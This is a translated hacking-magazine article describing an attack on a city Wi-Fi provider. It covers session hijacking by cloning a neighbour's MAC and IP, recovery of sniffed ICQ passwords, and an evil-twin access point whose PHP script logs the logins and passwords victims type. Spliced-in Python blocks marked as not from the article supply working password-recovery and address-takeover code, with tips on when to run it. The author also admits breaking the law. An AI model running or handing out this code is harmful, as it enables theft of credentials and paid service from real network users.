Official Site Of The Xakep 4T english version

Published 2011-04-16, 8:27 AM

Air colander: A tale about how one large wireless provider was hacked

Admit it: "Wireless Internet in every home" is a very attractive slogan. It sounds great when your ISP, which was still selling dial-up access five years ago, rolls out a large Wi-Fi infrastructure across the whole city (or at least its center) in just a few days. It sounds like a fool's dream come true: now you can enjoy a fast Internet connection while sitting in McDonald's and mopping up another McFresh. But when you look closer you realize that it cannot really be that way, because the information security of the ISP (and therefore of all its customers) leaves a lot to be desired. So as not to make unsubstantiated claims, I offer for your attention an informal audit of this newborn wireless network; who knows, maybe you will recognize your own bitter experience with your own provider.

Let's agree in advance: to observe etiquette and not embarrass my ISP, I will not name specific sites or brands. Moreover, no law was broken: the audit was carried out using only my own honestly purchased accounts. The purpose of this article is not to tarnish the company's honor but to show general weak points of a Wi-Fi infrastructure, points that can certainly be found in the Wi-Fi networks of the largest providers.

First disappointment

So, back to marketing. Imagine a large Russian million-plus city that fills up with advertising slogans like "Wireless, fast and convenient Internet access", "Enjoy the Web in your favorite cafe", and so on. When your city offers such an opportunity, you want to take it up immediately. After all, you must agree that it is convenient to sit in a cafe with your faithful laptop friend and talk over ICQ about some urgent matters.

But after a series of disconnects came the first disappointment. And not because the connection was weak, but because no re-authorization was required on reconnecting (even after ten minutes offline).

What the hell is that? It means I pay for Internet access and the ISP does not even care about my security: in theory, all my sessions are available to somebody else once I drop the connection and leave the place! After that "surprise" I decided to sniff the network a bit to check my assumptions.

I did not sniff the long list of cafe visitors' notebooks (connected to the same wireless ISP), since I am a law-abiding girl. Instead, I invited a friend with a laptop :). He bought me a cup of coffee and started imitating frantic Internet activity (he launched ICQ, logged in to a social network, checked his mail, and so on).

Sniff and ... strangle!

Not to waste time, I launched Wireshark and started monitoring the perimeter. Among all the packet traffic I immediately saw the SSL "handshake" with the provider's website...

By the way, do you know how the connection is authenticated? First, the client associates with the open access point (no WEP/WPA). As soon as he opens a browser and enters any website, he is redirected to the ISP's login page. There he enters his personal login and password (obtained by sending an SMS to a specific number), and then, apparently, a rule is created on the router that lets that particular client (identified by its address) out to the Internet.

So, after the SSL-encrypted authentication was finished, I saw an absolutely unencrypted password and e-mail from the VKontakte social network, some lightly XORed ICQ passwords (which are easily recovered with Ufasoft Sniffer or Intercepter), and also some indecent porn site links (my friend is not a shy one... :). I am not talking about the other network clients (I filtered them out by IP address so as not to break the law).
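The "lightly XORed" ICQ passwords deserve a closer look. Classic ICQ/OSCAR clients sent the password in the first login frame "roasted", that is, XORed with a fixed 16-byte key that every client shipped with, so recovering it from a capture is trivial. The following is an added example, not code from the article or from the sniffers it names: the login frame it parses is constructed inline to stand in for a captured one, and the UIN and password in it are made up.

```python
"""Recover a plaintext ICQ password from a captured OSCAR login frame.

Added example, not from the article. Old ICQ clients authenticated with a
FLAP channel-1 frame carrying TLV 0x0001 (UIN) and TLV 0x0002 (password
XORed with the fixed 16-byte OSCAR "roast" key). XOR with a public key is
obfuscation, not encryption, which is why any sniffer can undo it.
"""
import struct

# The roast key every classic ICQ/AIM client used for channel-1 logins
ROAST_KEY = bytes([0xF3, 0x26, 0x81, 0xC4, 0x39, 0x86, 0xDB, 0x92,
                   0x71, 0xA3, 0xB9, 0xE6, 0x53, 0x7A, 0x95, 0x7C])
TLV_UIN, TLV_ROASTED_PASSWORD = 0x0001, 0x0002


def roast(data: bytes) -> bytes:
    """XOR with the repeating key; applying it twice gives the input back."""
    return bytes(b ^ ROAST_KEY[i % len(ROAST_KEY)] for i, b in enumerate(data))


def parse_tlvs(data: bytes) -> dict:
    """Split a TLV chain (2-byte type, 2-byte length, value) into a dict."""
    tlvs, off = {}, 0
    while off + 4 <= len(data):
        ttype, tlen = struct.unpack_from("!HH", data, off)
        off += 4
        tlvs[ttype] = data[off:off + tlen]
        off += tlen
    return tlvs


def recover_icq_login(flap: bytes):
    """Return (uin, password) from a channel-1 FLAP frame, or None."""
    # FLAP header: 0x2A, channel, 2-byte sequence, 2-byte data length
    if len(flap) < 6 or flap[0] != 0x2A or flap[1] != 1:
        return None
    length = struct.unpack_from("!H", flap, 4)[0]
    body = flap[6:6 + length]
    if len(body) < 4:
        return None
    tlvs = parse_tlvs(body[4:])          # skip the 4-byte protocol version
    if TLV_UIN not in tlvs or TLV_ROASTED_PASSWORD not in tlvs:
        return None
    uin = tlvs[TLV_UIN].decode("ascii")
    password = roast(tlvs[TLV_ROASTED_PASSWORD]).decode("latin-1")
    return uin, password


def tlv(ttype: int, value: bytes) -> bytes:
    return struct.pack("!HH", ttype, len(value)) + value


def build_login_frame(uin: str, password: str, seq: int = 0x1234) -> bytes:
    """Construct the frame a classic client would send (test data, not a capture)."""
    body = (b"\x00\x00\x00\x01"           # protocol version 1
            + tlv(TLV_UIN, uin.encode("ascii"))
            + tlv(TLV_ROASTED_PASSWORD, roast(password.encode("latin-1"))))
    return bytes([0x2A, 1]) + struct.pack("!HH", seq, len(body)) + body


# Constructed sample: a made-up UIN and password, as they would cross the air
SAMPLE_FRAME = build_login_frame("123456789", "qwerty")

if __name__ == "__main__":
    print(recover_icq_login(SAMPLE_FRAME))   # ('123456789', 'qwerty')
```

In a real capture the frame is the first thing the client sends on the login connection (TCP port 5190), right after the server's version frame; nothing about it depends on the Wi-Fi link, so the same recovery works on any network where the traffic is visible in the clear.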

But as they say, if you really want something you can (and should!) bend the rules a little, just to expand your horizons :). Spoofing is easy once you know the IP and MAC addresses of the perimeter's users (they can be learned by analyzing ARP messages).

The ISP's website states that you should "Log out" on the authorization site before disconnecting from the network; otherwise your account remains usable for some time after you drop the connection. This is just what we need, because not every user will bother with that :).

So, we substitute the MAC address of our wireless adapter with the neighbor's MAC, using a nice MAC-changing tool such as MACChange (you can also do it manually, a matter of taste).

Do not forget to assign his IP address too. Now try to connect to the network. Lo and behold! It turns out the ISP allows both DHCP and static addressing, so the borrowed address is accepted. You can now enjoy the pleasures of wireless Internet absolutely free of charge, or rather at someone else's expense!
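As an added example (not the article's code), here is how the ARP-based discovery and the MAC/IP takeover described in the last few paragraphs look when scripted on Linux instead of done by hand with MACChange. The ARP frames are constructed inline to stand in for a sniffer capture; the interface name wlan0, the /24 prefix and the gateway address are assumptions.

```python
"""Build an IP -> MAC map of the wireless segment from raw ARP frames and
emit the Linux commands that clone one neighbour's addresses.

Added example, not part of the original article. The frames below are
constructed test data; in practice they come from a sniffer on the
wireless adapter (every ARP request or reply announces the sender's own
IP/MAC binding, so passive listening is enough).
"""
import struct

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def parse_arp(frame: bytes):
    """Return (op, sender_ip, sender_mac) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _, _, ethertype = ETH_HDR.unpack_from(frame)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, _, _ = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return op, ip_str(spa), mac_str(sha)


def neighbour_table(frames) -> dict:
    """Map IP -> MAC from the sender fields of every ARP request and reply.
    ARP probes (sender IP 0.0.0.0) carry no usable binding and are skipped."""
    table = {}
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        op, spa, sha = parsed
        if op in (ARP_REQUEST, ARP_REPLY) and spa != "0.0.0.0":
            table[spa] = sha
    return table


def clone_commands(ip, mac, gateway, iface="wlan0", prefix=24) -> list:
    """Linux `ip` commands to take over a neighbour's MAC and static IP.
    Interface name, prefix length and gateway are assumptions for this example."""
    return [
        f"ip link set dev {iface} down",
        f"ip link set dev {iface} address {mac}",
        f"ip link set dev {iface} up",
        f"ip addr flush dev {iface}",
        f"ip addr add {ip}/{prefix} dev {iface}",
        f"ip route add default via {gateway}",
    ]


# ---- constructed sample capture (not real traffic) ----
def mac_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def ip_bytes(s: str) -> bytes:
    return bytes(int(x) for x in s.split("."))


def make_arp(op, sha, spa, tha, tpa) -> bytes:
    dst = b"\xff" * 6 if op == ARP_REQUEST else tha
    return ETH_HDR.pack(dst, sha, ETHERTYPE_ARP) + ARP_HDR.pack(1, 0x0800, 6, 4, op, sha, spa, tha, tpa)


SAMPLE_FRAMES = [
    # a client asks for the gateway: announces its own binding in the request
    make_arp(ARP_REQUEST, mac_bytes("02:00:00:00:00:07"), ip_bytes("10.0.0.7"), b"\x00" * 6, ip_bytes("10.0.0.1")),
    # the gateway replies
    make_arp(ARP_REPLY, mac_bytes("00:00:00:00:00:aa"), ip_bytes("10.0.0.1"), mac_bytes("02:00:00:00:00:07"), ip_bytes("10.0.0.7")),
    # another client answering the gateway
    make_arp(ARP_REPLY, mac_bytes("02:00:00:00:00:0c"), ip_bytes("10.0.0.12"), mac_bytes("00:00:00:00:00:aa"), ip_bytes("10.0.0.1")),
    # an ARP probe from a host still acquiring an address: no binding yet
    make_arp(ARP_REQUEST, mac_bytes("02:00:00:00:00:ff"), ip_bytes("0.0.0.0"), b"\x00" * 6, ip_bytes("10.0.0.99")),
    # an IPv4 frame, which the parser must ignore
    ETH_HDR.pack(mac_bytes("00:00:00:00:00:aa"), mac_bytes("02:00:00:00:00:07"), 0x0800) + b"\x45" + b"\x00" * 39,
]

if __name__ == "__main__":
    table = neighbour_table(SAMPLE_FRAMES)
    for ip, mac in table.items():
        print(ip, mac)
    victim = "10.0.0.7"
    print("\n".join(clone_commands(victim, table[victim], "10.0.0.1")))
```

The commands are printed rather than executed on purpose: pick a station that has just gone quiet (the account stays authorized for a while, as the ISP's own site admits) and run them as root; as long as the real owner is still on the air, two stations with the same MAC/IP will fight over the gateway's ARP cache.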

And what if..?

Well, now that we have already broken the law, let's deepen and broaden the experiment. What else can we do to show the weak points of this wireless network? A fake access point with a MitM attack comes to mind, but that cannot be done within the cafe itself.

For that we need several components: a web server, an access point and a laptop for tests.

So I had to go home, dig an old DIR-300 off a dusty shelf and configure it as a DHCP server. I also set the access point's SSID to the same value as the operator's.

As the web server I chose the compact and convenient Small HTTP Server. Much has been said about that software; I like it for its convenient interface and fairly wide functionality despite its very small size.

Set up the web server and the DNS server so that whenever the user tries to open any web page he is sent to an HTML page that looks like the ISP's login page. Now create a PHP script that saves everything entered into the form to a separate .txt file.

<?php
// Save the login and password submitted by the fake portal form to a text file.
$filename = 'S:\home\localhost\www\info.txt';
$a = isset($_GET['login']) ? $_GET['login'] : '';
$b = isset($_GET['password']) ? $_GET['password'] : '';
$somecontent = " -- Login - \n" . $a . " --Password - \n" . $b . " -- \n";

if (is_writable($filename)) {
    // 'a' appends, so earlier victims' entries are not overwritten
    if (!$handle = fopen($filename, 'a')) {
        echo " Cannot open the file ($filename)";
        exit;
    }
    if (fwrite($handle, $somecontent) === false) {
        echo " Unable to write to the ($filename) file ";
    } else {
        // The victim should see nothing that reveals what happened
        echo " ";
    }
    fclose($handle);
} else {
    echo "File $filename is not writable ";
}
?>

The fake is ready. Now let's run it!

MitM in action

The plan for stealing login details for wireless network access is as follows. The user turns on his Wi-Fi adapter and tries to connect to the wireless network. In the list of available networks he sees the fake access point with the same SSID as the ISP's; the system lists it first because its signal is stronger than the operator's. The user connects to the fake access point, opens a browser and lands on the fake login page, whose interface mimics the ISP's login page. Suspecting nothing, he enters his login details in the appropriate fields. Finally, when he clicks "Enter", the PHP script stores everything he typed in a text file on the server. The user is left without an Internet connection (and, of course, without his login and password :) - editor's note).

Let's log in to the fake access point ourselves so as not to lose sight of any details. Fill in the login details and press "Enter". Nothing happens further; that is what the regular user thinks. Meanwhile, our script has already done its dirty little business and the login details are stored on the server. Now open the txt file and look at its contents. Voila! Here is the data we typed, and there is a surprise: someone else has already connected to our fake access point, and now there are a couple of real logins and passwords that can be used to log in to the ISP's real wireless network. Even SSL authorization does not prevent the theft of login details in this case: the victim never reaches the ISP's page at all, so the ISP's certificate is never presented.

The patient is more alive than dead

What can I say? The worst thing is that more than half of the wireless networks in the country work on a similar authentication scheme (I know of at least four big million-plus cities). And nobody can guarantee that the users are who they claim to be. Service owners almost never warn their customers about the vulnerability of their data and the risk of personal information being stolen. They are all eager to increase profits while neglecting security, since providing a higher security level would reduce the data rate and complicate the setup of customer equipment.

So finally, I want to give all of you some good advice: pay attention to which access point you connect to, and do not send any important information over unprotected networks (or use a VPN connection), because it can lead to fatal consequences.


Warning! This information is presented strictly for educational purposes! Neither the author nor the editors are responsible for any actions you might take!

Added by: XakepNews